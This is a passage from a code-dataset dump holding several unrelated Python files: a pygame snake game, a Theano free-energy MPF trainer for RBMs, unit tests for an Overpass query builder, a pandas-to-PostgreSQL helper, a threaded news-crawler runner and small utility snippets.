0:00:05.005210\n\"\"\"\n","sub_path":"languages/python/asyncio/meta.py","file_name":"meta.py","file_ext":"py","file_size_in_byte":11614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"390160936","text":"#OOPS implementation\r\n#NOTE: The creation of this game is focused on object oriented programming.\r\n\r\n'''We are working in a grid system with a total of 20 rows and 20 columns. So, if position is (10, 10) \r\nmeans we are in 11th column and the 11th row (because position count starts from 0)'''\r\n\r\nimport random\r\nimport math\r\nimport pygame\r\nimport time\r\nimport tkinter as tk\r\nfrom tkinter import messagebox\r\n\r\npygame.init()\r\nmove_sound = pygame.mixer.Sound(\"move.mp3\")\r\neat_sound = pygame.mixer.Sound(\"Snack2.mp3\")\r\npygame.mixer.music.load(\"back1.mp3\")\r\n\r\npygame.font.init()\r\nfont_style = 
pygame.font.SysFont(\"bahnschrift\", 25)\r\nscore_font = pygame.font.SysFont(\"comicsansms\", 25)\r\n\r\ndef draw_text_middle(surface, text, size, color): \r\n    global width\r\n    font = pygame.font.SysFont('comicsans', size, bold = True)\r\n    label = font.render(text, 1, color)\r\n\r\n    surface.blit(label, (width/5, width/2))\r\n\r\nclass cube(object):\r\n    rows = 20\r\n    w = 500\r\n    def __init__(self, start, dirnx=1, dirny=0,color=(255, 0, 0)): #'dirnx=1' -> snake starts moving(right) automatically when game starts\r\n        self.pos = start\r\n        self.dirnx = 1\r\n        self.dirny = 0\r\n        self.color = color \r\n        \r\n    def move(self, dirnx, dirny): #here,(dirnx, dirny): change-in-position(made in 'snake'class) but in '__init__()' it's the starting-position\r\n        self.dirnx = dirnx\r\n        self.dirny = dirny\r\n        self.pos = (self.pos[0] + self.dirnx, self.pos[1] + self.dirny) #changes position so that snake appears to move\r\n\r\n    def draw(self, surface, eyes=False):\r\n        dis = self.w // self.rows #'dis' is the width(length=width) of one grid \r\n        i = self.pos[0] #column number\r\n        j = self.pos[1] #row number\r\n        pygame.draw.rect(surface, self.color, (i*dis+1, j*dis+1, dis-2, dis-2)) #pygame.draw.rect(Surface, color, (left, top, width, height))\r\n        #Drawing the eyes\r\n        if eyes:\r\n            centre = dis // 2 #'//' is floor division: the result is an integer\r\n            radius = 3\r\n            circleMiddle = (i*dis + centre - radius, j*dis + 8)\r\n            circleMiddle2 = (i*dis + dis - radius*2, j*dis + 8)\r\n            pygame.draw.circle(surface, (0, 0, 0), circleMiddle, radius) #pygame.draw.circle(Surface, color, pos, radius)\r\n            pygame.draw.circle(surface, (0, 0, 0), circleMiddle2, radius)\r\n\r\n#contains a bunch of cube objects\r\nclass snake(object):\r\n    body = [] #contains the address of cube-objects present at different position\r\n    turns = {}\r\n\r\n    def __init__(self, color, pos):\r\n        self.color = color\r\n        self.head = cube(pos) #head of snake(first cube) is equal to cube at given position\r\n        self.body.append(self.head) #adding cubes(position) to make the body \r\n        self.dirnx = 0\r\n        self.dirny = 0\r\n\r\n    def move(self):\r\n        global opposite_dirn\r\n        for event in pygame.event.get():\r\n            if event.type == pygame.QUIT:\r\n                pygame.quit()\r\n\r\n            #keys = pygame.key.get_pressed() ->gets a dictionary of all keyboard-keys and if they were pressed(value = 1) or not(value = 0)\r\n\r\n            if event.type == pygame.KEYDOWN:\r\n                if event.key == pygame.K_LEFT:\r\n                    pygame.mixer.Sound.play(move_sound)\r\n                    if self.dirnx == 1:\r\n                        #flag the reversed-direction key press (checked by the collision test in the main loop) and ignore it\r\n                        opposite_dirn = True\r\n                        continue\r\n                    else:\r\n                        self.dirnx = -1\r\n                        self.dirny = 0\r\n                    '''Now we should store the position where the snake(head) turns so that whole body also turns. \r\n                    Thus we add a key(by copying([:]) current position-of-head('self.head.pos') as key) and set its \r\n                    value = '[self.dirnx, self.dirny]' to the 'turns' dictionary'''\r\n                    self.turns[self.head.pos[:]] = [self.dirnx, self.dirny] #'[:]' copies the tuple to a variable(to key-of-dictionary)\r\n                elif event.key == pygame.K_RIGHT:\r\n                    pygame.mixer.Sound.play(move_sound)\r\n                    if self.dirnx == -1:\r\n                        opposite_dirn = True\r\n                        continue\r\n                    else:\r\n                        self.dirnx = 1\r\n                        self.dirny = 0\r\n                    self.turns[self.head.pos[:]] = [self.dirnx, self.dirny]\r\n                elif event.key == pygame.K_UP:\r\n                    pygame.mixer.Sound.play(move_sound)\r\n                    if self.dirny == 1:\r\n                        opposite_dirn = True\r\n                        continue\r\n                    else:\r\n                        self.dirny = -1\r\n                        self.dirnx = 0\r\n                    self.turns[self.head.pos[:]] = [self.dirnx, self.dirny]\r\n                    #print(self.dirnx, self.dirny) # prints 0 -1 in console\r\n                elif event.key == pygame.K_DOWN:\r\n                    pygame.mixer.Sound.play(move_sound)\r\n                    if self.dirny == -1:\r\n                        opposite_dirn = True\r\n                        continue\r\n                    else:\r\n                        self.dirny = 1\r\n                        self.dirnx = 0\r\n                    self.turns[self.head.pos[:]] = [self.dirnx, self.dirny]\r\n\r\n        for i, c in enumerate(self.body): #'c' points to the cubes; one cube at a time; present in the list 'body'\r\n            p = c.pos[:] #copying([:]) the position-of-current-cube(c.pos) to new variable 'p' \r\n            ''' we may have written just 'p = c.pos' but it may cause problems when 'c.position' changes its value. But '[:]' copies the \r\n            value of 'c.pos' to the new variable 'p' thus 'p' won't change even if 'c.pos' changes''' \r\n            #If we have pressed any of the four arrow keys\r\n            if p in self.turns: #if the cube position present in 'turns' as a 'key-of-the-dictionary'\r\n                turn = self.turns[p] #storing the position(x, y; where we want to turn); in a tuple(here: 'turn')\r\n                c.move(turn[0], turn[1]) #turns[0] -> x and turns[1] -> y; here we actually move\r\n                if i == len(self.body) - 1:\r\n                    self.turns.pop(p) #dict.'pop(k, d=None)'-> removes specified key and return the corresponding value\r\n                    '''once we are on the last cube we'll remove 'p' to avoid this -> Whenever the snake reaches position 'p' on screen,\r\n                    it will turn regardless of pressing any key because 'p' is still present in the 'turns' dictionary''' \r\n\r\n            #When snake reaches the end of screen, it emerges from the other side\r\n            else:\r\n                '''[dirnx = -1] -> left direction but [dirny = -1] -> upward direction\r\n                [c.row - 1] -> last row or column'''\r\n                if c.dirnx == -1 and c.pos[0] <= 0: #while moving left and crosses the left end(x = 0)\r\n                    c.pos = (c.rows-1, c.pos[1]) #'rows' represent columns\r\n                elif c.dirnx == 1 and c.pos[0] >= c.rows-1: #while moving right and crosses the right end(x is max)\r\n                    c.pos = (0, c.pos[1])#'rows' represent columns\r\n                elif c.dirny == 1 and c.pos[1] >= c.rows-1: #while moving down crosses the bottom(y is max)\r\n                    c.pos = (c.pos[0], 0)#'rows' represent rows\r\n                elif c.dirny == -1 and c.pos[1] <= 0: #while moving up crosses the top (y = 0)\r\n                    c.pos = (c.pos[0], c.rows-1)#'rows' represent rows\r\n                else: #if a key is pressed to change the direction and thus snake doesn't reach any end\r\n                    c.move(c.dirnx, c.dirny) #then keep on moving in the changed direction \r\n\r\n    def reset(self, pos):\r\n        self.head = cube(pos) #head of snake(first cube) is equal to cube at given position\r\n        self.body = []\r\n        self.body.append(self.head) #adding cubes(position) to make the body \r\n        self.turns = {}\r\n        self.dirnx = 0\r\n        self.dirny = 1\r\n\r\n    def addCube(self):\r\n        tail = self.body[-1]\r\n        dx, dy = tail.dirnx, tail.dirny \r\n\r\n        if dx == 1 and 
dy == 0: #when going right, add cube to the left of tail\r\n self.body.append(cube((tail.pos[0]-1, tail.pos[1])))\r\n elif dx == -1 and dy == 0:\r\n self.body.append(cube((tail.pos[0]+1, tail.pos[1])))\r\n elif dx == 0 and dy == 1:\r\n self.body.append(cube((tail.pos[0], tail.pos[1]-1)))\r\n elif dx == 0 and dy == -1:\r\n self.body.append(cube((tail.pos[0], tail.pos[1]+1)))\r\n\r\n #added cube should move in directoion of tail \r\n self.body[-1].dirnx = dx\r\n self.body[-1].dirny = dy\r\n\r\n def draw(self, surface):\r\n for i, c in enumerate(self.body):\r\n if i == 0: #if it's the first cube\r\n c.draw(surface, True) #draws both (cube and eyes) \r\n else:\r\n c.draw(surface) #draws the cube only\r\n\r\ndef drawGrid(w, rows, surface):\r\n spaceBtw = w // rows\r\n x = 0\r\n y = 0\r\n for i in range(rows):\r\n x += spaceBtw\r\n y += spaceBtw\r\n pygame.draw.line(surface, (255, 255, 255), (x, 0), (x, w)) #vertical lines\r\n pygame.draw.line(surface, (255, 255, 255), (0, y), (w, y)) #horizontal lines\r\n\r\ndef redrawWindow(surface, score):\r\n global width, rows, s, snack\r\n surface.fill((0, 0 , 0))\r\n my_score(score)\r\n s.draw(surface)\r\n snack.draw(surface)\r\n #drawGrid(width, rows, surface)\r\n pygame.display.update()\r\n\r\ndef randomSnack(row, item): #'item' is snake object\r\n global rows\r\n positions = item.body #'positions' is a list of different cubes('cube-objects') present in the current-snake-length(the list 'body') \r\n\r\n while True:\r\n x = random.randrange(rows) #random column-number between 0 and 20\r\n y = random.randrange(rows) #random row-number between 0 and 20\r\n\r\n #filter(function, sequence) -> 'function' checks the sequence and filters out the items according to 'function'\r\n #lambda arguments:expression -> can take any number of arguments, but only one expression(executed and the result is returned)\r\n\r\n #Ensuring that snack never appears on snake\r\n\r\n if len(list(filter(lambda z:z.pos == (x, y), positions))) > 0:\r\n continue\r\n '''NOTE: Here 'z' switches b/w different cube-objects present in the list 'body'(of 'snake' class).If object-position('z.pos') is equal\r\n to snack-position(x,y),then we'll store 'z.pos' in a list; this makes list-length > 0.Hence,list-length tells us \r\n if the snack is present on the snake or not; and if it is, then another value for (x, y) gets chosen.'''\r\n else:\r\n break\r\n \r\n return (x, y)\r\n\r\ndef my_score(score):\r\n win = pygame.display.set_mode((width, width))\r\n value = score_font.render(\"Score: \" + str(score), True, (255, 255, 255))\r\n win.blit(value, [0, 0])\r\n\r\ndef message_box(subject, content):\r\n root = tk.Tk()\r\n root.attributes(\"-topmost\", True)\r\n messagebox.showinfo(subject, content)\r\n try:\r\n root.destroy()\r\n except:\r\n pass\r\n\r\ndef main():\r\n global width, rows, s, snack, opposite_dirn\r\n width = 500\r\n rows = 20\r\n win = pygame.display.set_mode((width, width))\r\n s = snake((255, 0, 0), (10, 10)) #snake(color, pos)\r\n snack = cube(randomSnack(rows, s), color = (0, 255, 0))\r\n clock = pygame.time.Clock()\r\n play = True\r\n score = 0\r\n pygame.mixer.music.play(-1)\r\n speed = 10\r\n\r\n while play:\r\n opposite_dirn = False\r\n #pygame.time.delay(50)\r\n clock.tick(speed)\r\n speed += 0.03\r\n if speed >= 17:\r\n speed = 17\r\n s.move()\r\n if s.body[0].pos == snack.pos:\r\n pygame.mixer.Sound.play(eat_sound)\r\n score += 1\r\n s.addCube()\r\n snack = cube(randomSnack(rows, s), color = (0, 255, 0))\r\n for x in range(len(s.body)):\r\n #map(function, iterable) -> 
every iterable is passed to function and result is returned\r\n            if s.body[x].pos in list(map(lambda z:z.pos, s.body[x+1:])) and opposite_dirn == False: \r\n                draw_text_middle(win, \"GAME OVER!\", 50, (255, 255, 255))\r\n                pygame.display.update()\r\n                pygame.time.delay(3000)\r\n                s.reset((10, 10))\r\n                score = 0\r\n                break\r\n            \r\n        redrawWindow(win, score)\r\n\r\nmain()\r\n","sub_path":"public/3main2.py","file_name":"3main2.py","file_ext":"py","file_size_in_byte":12462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"548172121","text":"import sys, pygame\nfrom pygame.locals import *\n\n\nclass Tile():\n\n\n    def __init__(self, img, x, y):\n        self.image_location = img\n        self.image = pygame.image.load(img)\n        self.x = x\n        self.y = y\n","sub_path":"demo_game/Tile.py","file_name":"Tile.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"52541433","text":"'''\nThis is the Deep MPF which uses the free energy.\n'''\n\nimport numpy as np\nimport gzip\nimport timeit, pickle, sys, math\nimport theano\nimport theano.tensor as T\nimport matplotlib.pyplot as plt\nfrom lasagne.updates import nesterov_momentum\nfrom lasagne.updates import adam, rmsprop\nfrom theano.tensor.shared_randomstreams import RandomStreams\nimport sys\nsys.setrecursionlimit(40000)\n\n\nclass free_energy_dmpf_optimizer(object):\n\n    def __init__(self,epsilon = 1.0, visible_units = 16, hidden_units =8, W = None, b_vis = None,b_hid = None,\n                 input = None,explicit_EM = False, batch_sz = 20, theano_rng = None, connect_function = '1-bit-flip' ):\n        '''\n\n        :param W: the weights of the graph\n        :param b: the bias of the graph\n        :param input: input binary data samples\n        :param connect_function: connection type\n        :return:\n        '''\n        #W = np.load(W_path)\n        #b = np.load(b_path)\n        self.visible_units = visible_units\n        self.hidden_units = hidden_units\n\n        numpy_rng = np.random.RandomState(12336)\n\n        if theano_rng is None:\n            theano_rng = RandomStreams(numpy_rng.randint(2 ** 30))\n        self.theano_rng = theano_rng\n\n        if W is None:\n            initial_W = np.asarray(numpy_rng.randn(self.visible_units, self.hidden_units) / np.sqrt(self.visible_units),\n                                   dtype=theano.config.floatX)\n            # theano shared variables for weights and biases\n            self.W = theano.shared(value= initial_W, name='W', borrow=True)\n        else:\n            self.W = theano.shared(value=np.asarray(W,dtype=theano.config.floatX),name = 'Weight', borrow = True)\n\n        if b_vis is None:\n            self.b_vis = theano.shared(\n                value=np.zeros(self.visible_units,dtype=theano.config.floatX),name='b_vis',borrow=True)\n        else:\n            self.b_vis = theano.shared(value=np.asarray(b_vis,dtype=theano.config.floatX),name = 'b_vis', borrow = True)\n\n\n        if b_hid is None:\n            self.b_hid = theano.shared(\n                value=np.zeros(self.hidden_units, dtype=theano.config.floatX),name='bias',borrow=True)\n        else:\n            self.b_hid = theano.shared(value=np.asarray(b_hid,dtype=theano.config.floatX),name = 'bias', borrow = True)\n\n        self.epsilon = epsilon\n        self.batch_sz = batch_sz\n        if input is None:\n            self.input = T.matrix('input')\n        else:\n            self.input = input\n\n        self.params = [self.W, self.b_vis, self.b_hid]\n\n\n    def feedforward(self, data_samples):\n\n        return T.exp(T.dot(data_samples, self.W) + self.b_hid)\n\n\n    def free_energy(self, data_samples):\n\n        wx = self.feedforward(data_samples)\n        vbias_term = T.dot(data_samples, self.b_vis)\n        hidden_term = T.sum(T.log(1 + wx), axis=1)\n        return -hidden_term - vbias_term\n\n\n    def 
get_cost_updates(self, learning_rate = 0.01,):\n '''\n In this function we compute the cost of deep MPF for the 1-bit-flip case.\n We use a for-loop to compute the flip for each bit.\n We do not use tensor or the tile functions, which can help reduce the for-loop to single matrix operation.\n '''\n base_energy = self.feedforward(data_samples=self.input)\n\n cost = 0\n\n\n\n for j in range(50):\n\n i = np.random.randint(low=0,high=self.visible_units,size=(1,))[0]\n\n # in every step, compute the MPF between x and a one-bit-flip non-data neighbor\n\n non_data_energy = 1 + (base_energy * \\\n T.exp(T.dot((1-2*self.input[:,i].reshape([1,-1])).T, self.W[i,:].reshape([1,-1]))))\n\n data_energy = 1 + base_energy\n #energy_diff = T.sum(T.exp(0.5*T.log(T.prod(non_data_energy/data_energy, axis =1))))\n\n energy_diff = 0.5*T.sum(T.log(non_data_energy/data_energy),axis =1) \\\n - 0.5*self.b_vis[i]*(1-2*self.input[:,i].reshape([1,-1]))\n\n cost = cost + (self.epsilon/self.batch_sz)*T.sum(T.exp(energy_diff))\n\n #cost = T.sum(non_data_energy)\n gparams = T.grad(cost, self.params, consider_constant=[self.input])\n # W_grad = T.grad(cost=cost, wrt = self.W,consider_constant=[self.input])\n # b_vis_grad = T.grad(cost=cost, wrt=self.b_vis,consider_constant=[self.input])\n # b_hid_grad = T.grad(cost=cost, wrt=self.b_hid,consider_constant=[self.input])\n #\n # cache = W\n #\n # x += - learning_rate * dx / (np.sqrt(cache) + eps)\n\n #updates = [(self.params, self.params - learning_rate * gparams)]\n\n #updates = rmsprop(loss_or_grads=gparams,params=self.params, learning_rate=0.1, rho=0.9, epsilon=1e-08)\n\n updates = [\n (param, param - learning_rate * gparam)\n for param, gparam in zip(self.params, gparams)\n ]\n\n return cost, updates\n def propup(self, vis):\n '''This function propagates the visible units activation upwards to\n the hidden units\n\n Note that we return also the pre-sigmoid activation of the\n layer. As it will turn out later, due to how Theano deals with\n optimizations, this symbolic variable will be needed to write\n down a more stable computational graph (see details in the\n reconstruction cost function)\n\n '''\n pre_sigmoid_activation = T.dot(vis, self.W) \\\n + self.b_hid\n return [pre_sigmoid_activation, T.nnet.sigmoid(pre_sigmoid_activation)]\n\n def sample_h_given_v(self, v0_sample):\n ''' This function infers state of hidden units given visible units '''\n # compute the activation of the hidden units given a sample of\n # the visibles\n pre_sigmoid_h1, h1_mean = self.propup(v0_sample)\n # get a sample of the hiddens given their activation\n # Note that theano_rng.binomial returns a symbolic sample of dtype\n # int64 by default. If we want to keep our computations in floatX\n # for the GPU we need to specify to return the dtype floatX\n h1_sample = self.theano_rng.binomial(size=h1_mean.shape,\n n=1, p=h1_mean,\n dtype=theano.config.floatX)\n return [pre_sigmoid_h1, h1_mean, h1_sample]\n\n def propdown(self, hid):\n '''This function propagates the hidden units activation downwards to\n the visible units\n\n Note that we return also the pre_sigmoid_activation of the\n layer. 
As it will turn out later, due to how Theano deals with\n        optimizations, this symbolic variable will be needed to write\n        down a more stable computational graph (see details in the\n        reconstruction cost function)\n\n        '''\n        pre_sigmoid_activation = T.dot(hid, self.W.T) \\\n            + self.b_vis\n        return [pre_sigmoid_activation, T.nnet.sigmoid(pre_sigmoid_activation)]\n\n    def sample_v_given_h(self, h0_sample):\n        ''' This function infers state of visible units given hidden units '''\n        # compute the activation of the visible given the hidden sample\n        pre_sigmoid_v1, v1_mean = self.propdown(h0_sample)\n        # get a sample of the visible given their activation\n        # Note that theano_rng.binomial returns a symbolic sample of dtype\n        # int64 by default. If we want to keep our computations in floatX\n        # for the GPU we need to specify to return the dtype floatX\n        v1_sample = self.theano_rng.binomial(size=v1_mean.shape,\n                                             n=1, p=v1_mean,\n                                             dtype=theano.config.floatX)\n        return [pre_sigmoid_v1, v1_mean, v1_sample]\n\n    def gibbs_hvh(self, h0_sample):\n        ''' This function implements one step of Gibbs sampling,\n            starting from the hidden state\n        This function would be useful for performing CD and PCD'''\n        pre_sigmoid_v1, v1_mean, v1_sample = self.sample_v_given_h(h0_sample)\n        pre_sigmoid_h1, h1_mean, h1_sample = self.sample_h_given_v(v1_sample)\n        return [pre_sigmoid_v1, v1_mean, v1_sample,\n                pre_sigmoid_h1, h1_mean, h1_sample]\n\n    def gibbs_vhv(self, v0_sample):\n        ''' This function implements one step of Gibbs sampling,\n            starting from the visible state\n        This function would be useful for sampling from the RBM'''\n        pre_sigmoid_h1, h1_mean, h1_sample = self.sample_h_given_v(v0_sample)\n        pre_sigmoid_v1, v1_mean, v1_sample = self.sample_v_given_h(h1_sample)\n        return [pre_sigmoid_h1, h1_mean, h1_sample,\n                pre_sigmoid_v1, v1_mean, v1_sample]\n\n\nif __name__ == '__main__':\n\n\n    epsilon = 0.01\n    learning_rate = 0.02\n    vis_units = 10\n    hid_units = 10\n    num_units = vis_units + hid_units\n    index = T.lscalar()    # index to a mini batch\n    x = T.matrix('x')\n    batch_sz = 10\n\n\n    mpf_optimizer = free_energy_dmpf_optimizer(epsilon=epsilon, visible_units= vis_units, hidden_units= hid_units,\n                         input = x,batch_sz =batch_sz)\n\n    W = np.load('rbm_weight_10000.npy')\n    print(W.shape)\n\n    data = np.load('rbm_samples_10000.npy')\n    n_train_batches = data.shape[0]//batch_sz\n\n    data = theano.shared(value=np.asarray(data, dtype=theano.config.floatX),\n                            name = 'train', borrow = True)\n\n\n    cost, updates = mpf_optimizer.get_cost_updates(learning_rate=learning_rate)\n\n    train_mpf = theano.function(\n        [index],\n        cost,\n        updates=updates,\n        givens={\n            x: data[index * batch_sz: (index + 1) * batch_sz],\n        },\n        #on_unused_input='warn',\n    )\n\n    training_epochs = 400\n\n    start_time = timeit.default_timer()\n\n    mean_epoch_error = []\n\n    for epoch in range(training_epochs):\n\n        mean_cost = []\n        mean_batch_error = []\n        norm_batch_error = []\n\n\n        for batch_index in range(n_train_batches):\n\n            a = train_mpf(batch_index)\n            mean_cost += [a]\n            W_prime = mpf_optimizer.W.get_value(borrow = True)\n\n            error_W = np.sum((W - W_prime)**2)\n\n            mean_batch_error += [error_W/(vis_units*hid_units)]\n\n        mean_epoch_error += [np.mean(mean_batch_error)]\n\n        norm_batch_error += [np.mean(mean_cost)]\n        print('The cost for dmpf in epoch %d is %f, rmse is %f' % (epoch, norm_batch_error[-1], mean_batch_error[-1]))\n\n    end_time = timeit.default_timer()\n\n    pretraining_time = (end_time - start_time)\n\n    print ('Training took %f minutes' % (pretraining_time / 60.))\n\n\n    fig1 = 
plt.figure()\n ax1 = fig1.add_subplot(111)\n ax1.set_title('SGD Diff between W and W_prime')\n plt.imshow(np.abs(W - W_prime), extent=[0,10,0,10],aspect = 'auto')\n plt.colorbar()\n plt.show()\n fig1.savefig('free_energy_Sgd_Imageseq.png')\n\n\n np.save('free_energy_Wprime.npy',W_prime)\n\n #index = np.random.random_integers(low=0,high=127,size = (100,))\n\n W1 = W_prime.ravel()\n W2 = W.ravel()\n #\n # index = np.random.random_integers(low=0,high=300,size = (100,))\n # W1 = W1[index]\n # W2 = W2[index]\n\n fig1 = plt.figure()\n ax1 = fig1.add_subplot(111)\n ax1.set_title('SGD: Diff of Randomly 100 Weight')\n plt.plot(W1,'y')\n plt.plot(W2,'c')\n plt.legend(['Recover W', 'Original W'])\n plt.show()\n fig1.savefig('Free_Energy_Random_Diff.png')\n plt.close()\n\n print(mpf_optimizer.b_vis.get_value(borrow = True))\n\n print(mpf_optimizer.b_hid.get_value(borrow = True))\n\n\n\n\n\n\n\n","sub_path":"free_energy_dmpf.py","file_name":"free_energy_dmpf.py","file_ext":"py","file_size_in_byte":11523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"432378151","text":"import unittest\n\nimport mock\n\nfrom catatom2osm.config import osm3s_servers\nfrom catatom2osm.exceptions import CatIOError\nfrom catatom2osm.overpass import Query\n\n\nclass TestQuery(unittest.TestCase):\n @mock.patch.object(Query, \"set_search_area\")\n def test_init(self, m_q):\n q = Query(\"foo\")\n self.assertEqual(q.output, \"xml\")\n self.assertEqual(q.down, \"(._;>>;);\")\n self.assertEqual(q.meta, \"out meta;\")\n self.assertEqual(q.area_id, \"\")\n self.assertEqual(q.bbox, \"\")\n self.assertEqual(q.statements, [])\n m_q.assert_called_once_with(\"foo\")\n self.assertEqual(q.url, \"\")\n q = Query(\"foo\", \"json\", False, False)\n self.assertEqual(q.output, \"json\")\n self.assertEqual(q.down, \"\")\n self.assertEqual(q.meta, \"out;\")\n\n def test_set_search_area(self):\n q = Query(\"12345678\")\n self.assertEqual(q.area_id, \"12345678\")\n q.set_search_area(\"1,-2, 3.1,-4.99\")\n self.assertEqual(q.bbox, \"1,-2, 3.1,-4.99\")\n with self.assertRaises(TypeError):\n q.set_search_area(\"123456789\")\n with self.assertRaises(TypeError):\n q.set_search_area(\"123x5678\")\n with self.assertRaises(TypeError):\n q.set_search_area(\"-1\")\n with self.assertRaises(TypeError):\n q.set_search_area(\"1, 2a, 3, 4\")\n with self.assertRaises(TypeError):\n q.set_search_area(\"1, 2, 3\")\n with self.assertRaises(TypeError):\n q.set_search_area(\"1; 2; 3; 4\")\n\n def test_add(self):\n q = Query(\"1\").add(\"foo;bar;\")\n q.add([\"taz\", \"zap;\"]).add(\"raz\")\n self.assertEqual(set(q.statements), {\"foo\", \"bar\", \"taz\", \"zap\", \"raz\"})\n q.statements = []\n q.add(\"1\", \"2\", \"3\")\n self.assertEqual(set(q.statements), {\"1\", \"2\", \"3\"})\n\n def test_get_url(self):\n q = Query(\"1234\")\n self.assertEqual(q.get_url(), \"\")\n q.add(\"foo\", \"bar\")\n url = (\n osm3s_servers[0] + \"data=[out:xml][timeout:250];(area(3600001234)\"\n \"->.searchArea;foo(area.searchArea);bar(area.searchArea););\"\n \"(._;>>;);out meta;\"\n )\n self.assertEqual(q.get_url(), url)\n q = Query(\"1,2,3,4\", \"json\", False, False)\n q.add(\"foo\", \"bar\")\n url = \"taz?data=[out:json][timeout:250];(foo(1,2,3,4);\" \"bar(1,2,3,4););out;\"\n self.assertEqual(q.get_url(\"taz?\"), url)\n\n @mock.patch(\"catatom2osm.overpass.download\")\n def test_download(self, m_download):\n def raises_io(*args):\n raise CatIOError()\n\n def raises_io1(url, fn):\n if url == osm3s_servers[0]:\n raise CatIOError()\n\n 
q = Query(\"1,2,3,4\").add(\"foo\")\n        q.download(\"bar\")\n        m_download.wget.assert_called_once_with(q.get_url(), \"bar\")\n        m_download.wget = raises_io\n        with self.assertRaises(CatIOError):\n            q.download(\"bar\")\n        m_download.wget = raises_io1\n        q.download(\"bar\")\n\n    @mock.patch(\"catatom2osm.overpass.download\")\n    def test_read(self, m_download):\n        m_download.get_response.return_value.content = \"bar\"\n        q = Query(\"1,2,3,4\").add(\"foo\")\n        out = q.read()\n        m_download.get_response.assert_called_once_with(q.get_url())\n        self.assertEqual(out, \"bar\")\n","sub_path":"test/test_overpass.py","file_name":"test_overpass.py","file_ext":"py","file_size_in_byte":3306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"407452762","text":"import pandas as pd\nimport psycopg2\nfrom psycopg2 import sql\nimport StringIO\n\ndef cleanColumns(columns):\n    cols = []\n    for col in columns:\n        col = col.replace(' ', '_')\n        cols.append(col)\n    return cols\n\ndef pd_to_sql(df,table_name,conn):\n    data = StringIO.StringIO()\n    df.columns = cleanColumns(df.columns)\n    df.to_csv(data,header=False,index=False)\n    data.seek(0)\n    cur = conn.cursor()\n    cur.execute(\"DROP TABLE {}\".format(table_name))\n    empty_table = pd.io.sql.get_schema(df,table_name,con=conn)\n    empty_table = empty_table.replace('\"','')\n    cur.execute(empty_table)\n    cur.copy_from(data,table_name,sep=\",\")\n    conn.close()","sub_path":"DevInit/datahub_auto/pd_to_sql.py","file_name":"pd_to_sql.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"368081723","text":"#coding:utf-8\r\nfrom config import MainConfig as m\r\nfrom logger import Logger\r\nimport threading,string\r\nfrom time import sleep\r\nfrom crawler import feng, huanqiu, netease, sina, tencent, xinhua\r\n\r\nlist = [feng, huanqiu, netease, sina, tencent, xinhua]\r\n\r\ndef thread_main(className):\r\n    global count, mutex\r\n\r\n    # acquire the lock\r\n    mutex.acquire()\r\n    count = count + 1\r\n    # release the lock\r\n    mutex.release()\r\n\r\n    try:\r\n        className.run()\r\n        print(str(className) + \" succeeded!\")\r\n    except:\r\n        Logger.setLogger(m.log_path, 4, str(className) + \" Spider Failed\")\r\n\r\n    sleep(1)\r\n\r\ndef main():\r\n    global count, mutex\r\n    threads = []\r\n\r\n    count = 1\r\n    # create a lock\r\n    mutex = threading.Lock()\r\n    # create the thread objects first\r\n    for x in list:\r\n        threads.append(threading.Thread(target=thread_main, args=(x,)))\r\n    # start all threads\r\n    for t in threads:\r\n        t.start()\r\n    # wait in the main thread for all child threads to exit\r\n    for t in threads:\r\n        t.join()\r\n\r\nif __name__ == '__main__':\r\n    main()\r\n\r\n# def run():\r\n#     try:\r\n#         feng.run()\r\n#         print(\"ifeng crawler succeeded\")\r\n#     except:\r\n#         print(\"ifeng crawler failed\")\r\n#     try:\r\n#         huanqiu.run()\r\n#         print(\"huanqiu crawler succeeded\")\r\n#     except:\r\n#         print(\"huanqiu crawler failed\")\r\n#     try:\r\n#         netease.run()\r\n#         print(\"NetEase News crawler succeeded\")\r\n#     except:\r\n#         print(\"NetEase News crawler failed\")\r\n#     try:\r\n#         sina.run()\r\n#         print(\"sina crawler succeeded\")\r\n#     except:\r\n#         print(\"sina crawler failed\")\r\n#     try:\r\n#         tencent.run()\r\n#         print(\"Tencent News crawler succeeded\")\r\n#     except:\r\n#         print(\"Tencent News crawler failed\")\r\n#     try:\r\n#         xinhua.run()\r\n#         print(\"Xinhua crawler succeeded\")\r\n#     except:\r\n#         print(\"Xinhua crawler failed\")\r\n#\r\n#     print(\"All Finished\")\r\n#\r\n# if __name__ == '__main__':\r\n#     run()","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"478848017","text":"# _*_ coding: utf-8 _*_\n# @Time    : 2017/8/17 14:35\n# @Author  : GanZiB\n# @Site    : \n# @File 
: images-spider.py\n# @Software: PyCharm\n\nimport re\nimport urllib.request\nimport urllib.error\n\ndef craw(url, page):\n\thtmlList = urllib.request.urlopen(url).read()\n\thtmlListStr = str(htmlList)\n\tdivPattern = '
Query:\n    \"\"\"Filter analyses by database entry id.\"\"\"\n    return analyses.filter(Analysis.id == analysis_id)\n\n\nclass AnalysisFilter(Enum):\n    \"\"\"Define Analysis filter functions.\"\"\"\n\n    FILTER_BY_ID: Callable = filter_analyses_by_id\n\n\ndef apply_analysis_filter(\n    analyses: Query,\n    filter_functions: List[Callable],\n    analysis_id: Optional[int] = None,\n) -> Query:\n    \"\"\"Apply filtering functions and return filtered results.\"\"\"\n    for function in filter_functions:\n        analyses: Query = function(\n            analyses=analyses,\n            analysis_id=analysis_id,\n        )\n    return analyses\n","sub_path":"trailblazer/store/filters/analyses_filters.py","file_name":"analyses_filters.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"387580873","text":"def check_word(w):\n    # i : gap between the two letters, j : index of the first letter\n    for i in range(1,len(w)):\n        dict={}\n        for j in range(len(w)-i):\n            new_word=w[j]+w[j+i]\n            if(new_word in dict):\n                return False\n            